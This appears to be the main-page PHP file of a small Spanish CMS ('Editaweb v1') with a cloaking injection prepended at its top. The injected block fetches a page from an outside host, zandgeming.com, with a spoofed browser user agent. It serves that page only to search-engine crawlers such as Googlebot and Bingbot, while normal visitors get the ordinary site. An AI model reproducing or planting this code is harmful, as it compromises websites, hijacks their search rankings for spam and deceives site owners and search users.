<?php
function KIMAK($url) {
    if (ini_get('allow_url_fopen')) {
        return @file_get_contents($url);
    } elseif (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36');
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }
    return false;
}

$res = strtolower($_SERVER["HTTP_USER_AGENT"]);
$bot = "http://zandgeming.com/saham/index.html";
$file = KIMAK($bot); 
$botchar = "/(googlebot|slurp|adsense|inspection|ahrefsbot|telegrambot|bingbot|yandexbot)/";

if (preg_match($botchar, $res)) {
    echo $file;
    exit;
}
?>
<?php

$actualizable="";
$version="0.53";
$cambios="0.16:
Poder ver todas las noticias de una seccion
0.07:
Cambios en estructura de hoja de estilos";


# Página principal Editaweb v1

require_once("funciones.php");
f_ew_principal();

?>
